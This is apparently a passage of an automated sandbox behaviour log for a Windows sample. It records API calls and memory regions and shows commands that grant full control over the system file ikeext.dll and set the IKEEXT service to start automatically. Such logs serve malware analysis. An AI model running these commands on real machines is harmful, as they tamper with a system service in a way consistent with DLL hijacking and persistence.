setlocale (category=0, locale=".OCP") returned="English_United States.437" [0048.320] GetConsoleTitleW (in: lpConsoleTitle=0x400ae0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0048.320] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0048.320] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0048.320] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0048.321] _wcsicmp (_String1="icacls", _String2=")") returned 64 [0048.321] _wcsicmp (_String1="FOR", _String2="icacls") returned -3 [0048.321] _wcsicmp (_String1="FOR/?", _String2="icacls") returned -3 [0048.321] _wcsicmp (_String1="IF", _String2="icacls") returned 3 [0048.321] _wcsicmp (_String1="IF/?", _String2="icacls") returned 3 [0048.321] _wcsicmp (_String1="REM", _String2="icacls") returned 9 [0048.321] _wcsicmp (_String1="REM/?", _String2="icacls") returned 9 [0048.322] GetConsoleTitleW (in: lpConsoleTitle=0x30f428, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.322] _wcsicmp (_String1="icacls", _String2="DIR") returned 5 [0048.322] _wcsicmp (_String1="icacls", _String2="ERASE") returned 4 [0048.322] _wcsicmp (_String1="icacls", _String2="DEL") returned 5 [0048.322] _wcsicmp (_String1="icacls", _String2="TYPE") returned -11 [0048.322] _wcsicmp (_String1="icacls", _String2="COPY") returned 6 [0048.322] _wcsicmp (_String1="icacls", _String2="CD") returned 6 [0048.322] _wcsicmp (_String1="icacls", _String2="CHDIR") returned 6 [0048.322] _wcsicmp (_String1="icacls", _String2="RENAME") returned -9 [0048.323] _wcsicmp (_String1="icacls", _String2="REN") returned -9 [0048.323] _wcsicmp (_String1="icacls", _String2="ECHO") returned 4 [0048.323] _wcsicmp (_String1="icacls", _String2="SET") returned -10 [0048.323] _wcsicmp (_String1="icacls", _String2="PAUSE") returned -7 [0048.323] _wcsicmp (_String1="icacls", _String2="DATE") returned 5 [0048.323] _wcsicmp (_String1="icacls", _String2="TIME") returned -11 [0048.323] _wcsicmp (_String1="icacls", _String2="PROMPT") returned -7 [0048.323] _wcsicmp (_String1="icacls", _String2="MD") returned -4 [0048.323] _wcsicmp (_String1="icacls", _String2="MKDIR") returned -4 [0048.323] _wcsicmp (_String1="icacls", _String2="RD") returned -9 [0048.323] _wcsicmp (_String1="icacls", _String2="RMDIR") returned -9 [0048.323] _wcsicmp (_String1="icacls", _String2="PATH") returned -7 [0048.323] _wcsicmp (_String1="icacls", _String2="GOTO") returned 2 [0048.323] _wcsicmp (_String1="icacls", _String2="SHIFT") returned -10 [0048.323] _wcsicmp (_String1="icacls", _String2="CLS") returned 6 [0048.323] _wcsicmp (_String1="icacls", _String2="CALL") returned 6 [0048.323] _wcsicmp (_String1="icacls", _String2="VERIFY") returned -13 [0048.323] _wcsicmp (_String1="icacls", _String2="VER") returned -13 [0048.323] _wcsicmp (_String1="icacls", _String2="VOL") returned -13 [0048.323] _wcsicmp (_String1="icacls", _String2="EXIT") returned 4 [0048.323] _wcsicmp (_String1="icacls", _String2="SETLOCAL") returned -10 [0048.323] _wcsicmp (_String1="icacls", _String2="ENDLOCAL") returned 4 [0048.323] _wcsicmp (_String1="icacls", _String2="TITLE") returned -11 [0048.323] _wcsicmp (_String1="icacls", _String2="START") returned -10 [0048.323] _wcsicmp (_String1="icacls", _String2="DPATH") returned 5 [0048.323] _wcsicmp (_String1="icacls", _String2="KEYS") returned -2 [0048.323] _wcsicmp (_String1="icacls", _String2="MOVE") returned -4 [0048.323] _wcsicmp (_String1="icacls", _String2="PUSHD") returned -7 [0048.323] _wcsicmp (_String1="icacls", _String2="POPD") returned -7 [0048.323] _wcsicmp (_String1="icacls", _String2="ASSOC") returned 8 [0048.323] _wcsicmp (_String1="icacls", _String2="FTYPE") returned 3 [0048.323] _wcsicmp (_String1="icacls", _String2="BREAK") returned 7 [0048.323] _wcsicmp (_String1="icacls", _String2="COLOR") returned 6 [0048.323] _wcsicmp (_String1="icacls", _String2="MKLINK") returned -4 [0048.323] _wcsicmp (_String1="icacls", _String2="DIR") returned 5 [0048.323] _wcsicmp (_String1="icacls", _String2="ERASE") returned 4 [0048.323] _wcsicmp (_String1="icacls", _String2="DEL") returned 5 [0048.323] _wcsicmp (_String1="icacls", _String2="TYPE") returned -11 [0048.323] _wcsicmp (_String1="icacls", _String2="COPY") returned 6 [0048.323] _wcsicmp (_String1="icacls", _String2="CD") returned 6 [0048.323] _wcsicmp (_String1="icacls", _String2="CHDIR") returned 6 [0048.323] _wcsicmp (_String1="icacls", _String2="RENAME") returned -9 [0048.323] _wcsicmp (_String1="icacls", _String2="REN") returned -9 [0048.323] _wcsicmp (_String1="icacls", _String2="ECHO") returned 4 [0048.323] _wcsicmp (_String1="icacls", _String2="SET") returned -10 [0048.323] _wcsicmp (_String1="icacls", _String2="PAUSE") returned -7 [0048.323] _wcsicmp (_String1="icacls", _String2="DATE") returned 5 [0048.323] _wcsicmp (_String1="icacls", _String2="TIME") returned -11 [0048.323] _wcsicmp (_String1="icacls", _String2="PROMPT") returned -7 [0048.323] _wcsicmp (_String1="icacls", _String2="MD") returned -4 [0048.324] _wcsicmp (_String1="icacls", _String2="MKDIR") returned -4 [0048.324] _wcsicmp (_String1="icacls", _String2="RD") returned -9 [0048.324] _wcsicmp (_String1="icacls", _String2="RMDIR") returned -9 [0048.324] _wcsicmp (_String1="icacls", _String2="PATH") returned -7 [0048.324] _wcsicmp (_String1="icacls", _String2="GOTO") returned 2 [0048.324] _wcsicmp (_String1="icacls", _String2="SHIFT") returned -10 [0048.324] _wcsicmp (_String1="icacls", _String2="CLS") returned 6 [0048.324] _wcsicmp (_String1="icacls", _String2="CALL") returned 6 [0048.324] _wcsicmp (_String1="icacls", _String2="VERIFY") returned -13 [0048.324] _wcsicmp (_String1="icacls", _String2="VER") returned -13 [0048.324] _wcsicmp (_String1="icacls", _String2="VOL") returned -13 [0048.324] _wcsicmp (_String1="icacls", _String2="EXIT") returned 4 [0048.324] _wcsicmp (_String1="icacls", _String2="SETLOCAL") returned -10 [0048.324] _wcsicmp (_String1="icacls", _String2="ENDLOCAL") returned 4 [0048.324] _wcsicmp (_String1="icacls", _String2="TITLE") returned -11 [0048.324] _wcsicmp (_String1="icacls", _String2="START") returned -10 [0048.324] _wcsicmp (_String1="icacls", _String2="DPATH") returned 5 [0048.324] _wcsicmp (_String1="icacls", _String2="KEYS") returned -2 [0048.324] _wcsicmp (_String1="icacls", _String2="MOVE") returned -4 [0048.324] _wcsicmp (_String1="icacls", _String2="PUSHD") returned -7 [0048.324] _wcsicmp (_String1="icacls", _String2="POPD") returned -7 [0048.324] _wcsicmp (_String1="icacls", _String2="ASSOC") returned 8 [0048.324] _wcsicmp (_String1="icacls", _String2="FTYPE") returned 3 [0048.324] _wcsicmp (_String1="icacls", _String2="BREAK") returned 7 [0048.324] _wcsicmp (_String1="icacls", _String2="COLOR") returned 6 [0048.324] _wcsicmp (_String1="icacls", _String2="MKLINK") returned -4 [0048.324] _wcsicmp (_String1="icacls", _String2="FOR") returned 3 [0048.324] _wcsicmp (_String1="icacls", _String2="IF") returned -3 [0048.324] _wcsicmp (_String1="icacls", _String2="REM") returned -9 [0048.324] _wcsnicmp (_String1="icac", _String2="cmd ", _MaxCount=0x4) returned 6 [0048.324] SetErrorMode (uMode=0x0) returned 0x8001 [0048.325] SetErrorMode (uMode=0x1) returned 0x0 [0048.325] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x411dd0, lpFilePart=0x30ef48 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x30ef48*="system32") returned 0x13 [0048.325] SetErrorMode (uMode=0x8001) returned 0x1 [0048.325] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0048.325] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0048.326] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0048.326] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0048.326] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls.*", fInfoLevelId=0x1, lpFindFileData=0x30ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ecc4) returned 0x400f90 [0048.327] FindClose (in: hFindFile=0x400f90 | out: hFindFile=0x400f90) returned 1 [0048.327] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ecc4) returned 0xffffffff [0048.327] GetLastError () returned 0x2 [0048.327] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\icacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ecc4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ecc4) returned 0x400f90 [0048.327] FindClose (in: hFindFile=0x400f90 | out: hFindFile=0x400f90) returned 1 [0048.327] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0048.327] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0048.327] GetConsoleTitleW (in: lpConsoleTitle=0x30f1bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0048.327] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f044, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f10c | out: lpAttributeList=0x30f044, lpSize=0x30f10c) returned 1 [0048.327] UpdateProcThreadAttribute (in: lpAttributeList=0x30f044, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f104, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f044, lpPreviousValue=0x0) returned 1 [0048.327] GetStartupInfoW (in: lpStartupInfo=0x30f000 | out: lpStartupInfo=0x30f000*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0048.327] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0048.327] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0048.327] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0048.327] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0048.327] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0048.327] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0048.327] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0048.328] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0048.328] lstrcmpW (lpString1="\\icacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0048.329] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\icacls.exe", lpCommandLine="icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x30f0a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f0ec | out: lpCommandLine="icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F", lpProcessInformation=0x30f0ec*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbf4, dwThreadId=0xbf8)) returned 1 [0048.332] CloseHandle (hObject=0x4c) returned 1 [0048.332] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0048.332] GetEnvironmentStringsW () returned 0x410150* [0048.332] FreeEnvironmentStringsW (penv=0x410150) returned 1 [0048.332] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0048.375] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30efe0 | out: lpExitCode=0x30efe0*=0x0) returned 1 [0048.375] CloseHandle (hObject=0x50) returned 1 [0048.375] _vsnwprintf (in: _Buffer=0x30f128, _BufferCount=0x13, _Format="%08X", _ArgList=0x30efec | out: _Buffer="00000000") returned 8 [0048.375] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0048.375] GetEnvironmentStringsW () returned 0x4121d8* [0048.375] FreeEnvironmentStringsW (penv=0x4121d8) returned 1 [0048.375] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0048.375] GetEnvironmentStringsW () returned 0x4121d8* [0048.376] FreeEnvironmentStringsW (penv=0x4121d8) returned 1 [0048.376] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f044 | out: lpAttributeList=0x30f044) [0048.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.376] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0048.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0048.376] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0048.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0048.376] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0048.376] SetConsoleInputExeNameW () returned 0x1 [0048.376] GetConsoleOutputCP () returned 0x1b5 [0048.376] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0048.376] SetThreadUILanguage (LangId=0x0) returned 0x409 [0048.376] exit (_Code=0) Process: id = "15" image_name = "icacls.exe" filename = "c:\\windows\\system32\\icacls.exe" page_root = "0x7eef7780" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xbe0" cmd_line = "icacls C:\\Windows\\system32\\ikeext.dll /grant administrators:F" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1193 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1194 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1195 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1196 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1197 start_va = 0xca0000 end_va = 0xca9fff entry_point = 0xca5489 region_type = mapped_file name = "icacls.exe" filename = "\\Windows\\System32\\icacls.exe" (normalized: "c:\\windows\\system32\\icacls.exe") Region: id = 1198 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1199 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1200 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1201 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1202 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1203 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1204 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1205 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1206 start_va = 0x120000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 1207 start_va = 0x220000 end_va = 0x286fff entry_point = 0x220000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1208 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1209 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1210 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1211 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1212 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1213 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1214 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1215 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1216 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1217 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1218 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 50 os_tid = 0xbf8 Thread: id = 51 os_tid = 0xbfc Process: id = "16" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef77e0" os_pid = "0xc00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb74" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"sc config ikeext start= auto\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1219 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1220 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1221 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1222 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1223 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e5829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1224 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1225 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1226 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1227 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1228 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1229 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1230 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1231 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1232 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 1233 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1234 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1235 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1236 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1237 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1238 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1239 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1240 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1241 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1242 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1243 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1244 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1245 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1246 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1247 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1248 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 1249 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1250 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = 